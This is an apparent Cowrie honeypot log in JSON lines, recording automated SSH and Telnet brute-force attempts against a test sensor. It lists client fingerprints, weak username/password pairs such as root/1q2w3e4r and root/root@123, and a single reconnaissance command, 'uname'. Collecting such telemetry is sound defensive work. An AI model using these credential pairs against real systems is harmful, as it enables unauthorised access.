{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:06:01.843565Z","src_ip":"51.79.164.132","session":"baaf0c22ea35"}
{"eventid":"cowrie.login.failed","username":"rabbitmq","password":"rabbitmq","message":"login attempt [rabbitmq/rabbitmq] failed","sensor":"my-vps","timestamp":"2025-08-28T10:06:04.236147Z","src_ip":"51.79.164.132","session":"baaf0c22ea35"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:06:05.577980Z","src_ip":"51.79.164.132","session":"baaf0c22ea35"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":33904,"dst_ip":"1.2.3.4","dst_port":22,"session":"673a7bf96969","protocol":"ssh","message":"New connection: 51.79.164.132:33904 (1.2.3.4:22) [session: 673a7bf96969]","sensor":"my-vps","timestamp":"2025-08-28T10:06:28.110380Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:06:28.229041Z","src_ip":"51.79.164.132","session":"673a7bf96969"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:06:28.726051Z","src_ip":"51.79.164.132","session":"673a7bf96969"}
{"eventid":"cowrie.login.success","username":"root","password":"aa123456","message":"login attempt [root/aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:06:30.191760Z","src_ip":"51.79.164.132","session":"673a7bf96969"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:06:30.791488Z","src_ip":"51.79.164.132","session":"673a7bf96969"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T10:06:30.792253Z","src_ip":"51.79.164.132","session":"673a7bf96969"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:06:31.430285Z","src_ip":"51.79.164.132","session":"673a7bf96969"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:06:31.431554Z","src_ip":"51.79.164.132","session":"673a7bf96969"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":33358,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e9e5e30d400","protocol":"ssh","message":"New connection: 51.79.164.132:33358 (1.2.3.4:22) [session: 3e9e5e30d400]","sensor":"my-vps","timestamp":"2025-08-28T10:06:54.262638Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:06:54.464033Z","src_ip":"51.79.164.132","session":"3e9e5e30d400"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:06:54.464737Z","src_ip":"51.79.164.132","session":"3e9e5e30d400"}
{"eventid":"cowrie.login.success","username":"root","password":"1q2w3e4r","message":"login attempt [root/1q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:06:56.666294Z","src_ip":"51.79.164.132","session":"3e9e5e30d400"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:06:58.386553Z","src_ip":"51.79.164.132","session":"3e9e5e30d400"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T10:06:58.387269Z","src_ip":"51.79.164.132","session":"3e9e5e30d400"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:06:58.576881Z","src_ip":"51.79.164.132","session":"3e9e5e30d400"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:06:58.578293Z","src_ip":"51.79.164.132","session":"3e9e5e30d400"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58926,"dst_ip":"1.2.3.4","dst_port":23,"session":"e6b62148b6fb","protocol":"telnet","message":"New connection: 212.227.235.229:58926 (1.2.3.4:23) [session: e6b62148b6fb]","sensor":"my-vps","timestamp":"2025-08-28T10:07:02.736999Z"}
{"eventid":"cowrie.session.closed","duration":12.597145318984985,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:07:15.334073Z","src_ip":"212.227.235.229","session":"e6b62148b6fb"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":60226,"dst_ip":"1.2.3.4","dst_port":22,"session":"6962a57453a0","protocol":"ssh","message":"New connection: 51.79.164.132:60226 (1.2.3.4:22) [session: 6962a57453a0]","sensor":"my-vps","timestamp":"2025-08-28T10:07:20.756784Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:07:21.043849Z","src_ip":"51.79.164.132","session":"6962a57453a0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:07:21.044552Z","src_ip":"51.79.164.132","session":"6962a57453a0"}
{"eventid":"cowrie.login.success","username":"root","password":"root@123","message":"login attempt [root/root@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:07:23.411095Z","src_ip":"51.79.164.132","session":"6962a57453a0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:07:24.392706Z","src_ip":"51.79.164.132","session":"6962a57453a0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T10:07:24.393690Z","src_ip":"51.79.164.132","session":"6962a57453a0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:07:24.603444Z","src_ip":"51.79.164.132","session":"6962a57453a0"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:07:24.604747Z","src_ip":"51.79.164.132","session":"6962a57453a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52514,"dst_ip":"1.2.3.4","dst_port":23,"session":"409ee4b656ca","protocol":"telnet","message":"New connection: 212.227.125.160:52514 (1.2.3.4:23) [session: 409ee4b656ca]","sensor":"my-vps","timestamp":"2025-08-28T10:07:26.197885Z"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":35112,"dst_ip":"1.2.3.4","dst_port":22,"session":"072ff205279d","protocol":"ssh","message":"New connection: 51.79.164.132:35112 (1.2.3.4:22) [session: 072ff205279d]","sensor":"my-vps","timestamp":"2025-08-28T10:07:46.895489Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:07:47.030265Z","src_ip":"51.79.164.132","session":"072ff205279d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:07:47.566909Z","src_ip":"51.79.164.132","session":"072ff205279d"}
{"eventid":"cowrie.login.success","username":"root","password":"111111","message":"login attempt [root/111111] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:07:49.084131Z","src_ip":"51.79.164.132","session":"072ff205279d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:07:50.297345Z","src_ip":"51.79.164.132","session":"072ff205279d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T10:07:50.298070Z","src_ip":"51.79.164.132","session":"072ff205279d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:07:50.663947Z","src_ip":"51.79.164.132","session":"072ff205279d"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:07:50.665118Z","src_ip":"51.79.164.132","session":"072ff205279d"}
{"eventid":"cowrie.session.connect","src_ip":"64.226.104.126","src_port":6101,"dst_ip":"1.2.3.4","dst_port":22,"session":"61f18d474ed6","protocol":"ssh","message":"New connection: 64.226.104.126:6101 (1.2.3.4:22) [session: 61f18d474ed6]","sensor":"my-vps","timestamp":"2025-08-28T10:07:54.253951Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-28T10:07:54.281559Z","src_ip":"64.226.104.126","session":"61f18d474ed6"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T10:07:54.305787Z","src_ip":"64.226.104.126","session":"61f18d474ed6"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T10:07:55.053744Z","src_ip":"64.226.104.126","session":"61f18d474ed6"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:07:55.056112Z","src_ip":"64.226.104.126","session":"61f18d474ed6"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":43708,"dst_ip":"1.2.3.4","dst_port":22,"session":"dae6e7dddd98","protocol":"ssh","message":"New connection: 51.79.164.132:43708 (1.2.3.4:22) [session: dae6e7dddd98]","sensor":"my-vps","timestamp":"2025-08-28T10:08:13.447673Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:08:13.593326Z","src_ip":"51.79.164.132","session":"dae6e7dddd98"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:08:14.182305Z","src_ip":"51.79.164.132","session":"dae6e7dddd98"}
{"eventid":"cowrie.login.failed","username":"wang","password":"123456","message":"login attempt [wang/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T10:08:15.687450Z","src_ip":"51.79.164.132","session":"dae6e7dddd98"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:08:17.169551Z","src_ip":"51.79.164.132","session":"dae6e7dddd98"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.145","src_port":60910,"dst_ip":"1.2.3.4","dst_port":22,"session":"37a6ac6794bb","protocol":"ssh","message":"New connection: 193.32.162.145:60910 (1.2.3.4:22) [session: 37a6ac6794bb]","sensor":"my-vps","timestamp":"2025-08-28T10:08:29.489543Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:08:29.490763Z","src_ip":"193.32.162.145","session":"37a6ac6794bb"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T10:08:29.521146Z","src_ip":"193.32.162.145","session":"37a6ac6794bb"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123solana","message":"login attempt [ubuntu/123solana] failed","sensor":"my-vps","timestamp":"2025-08-28T10:08:29.613494Z","src_ip":"193.32.162.145","session":"37a6ac6794bb"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:08:30.648638Z","src_ip":"193.32.162.145","session":"37a6ac6794bb"}
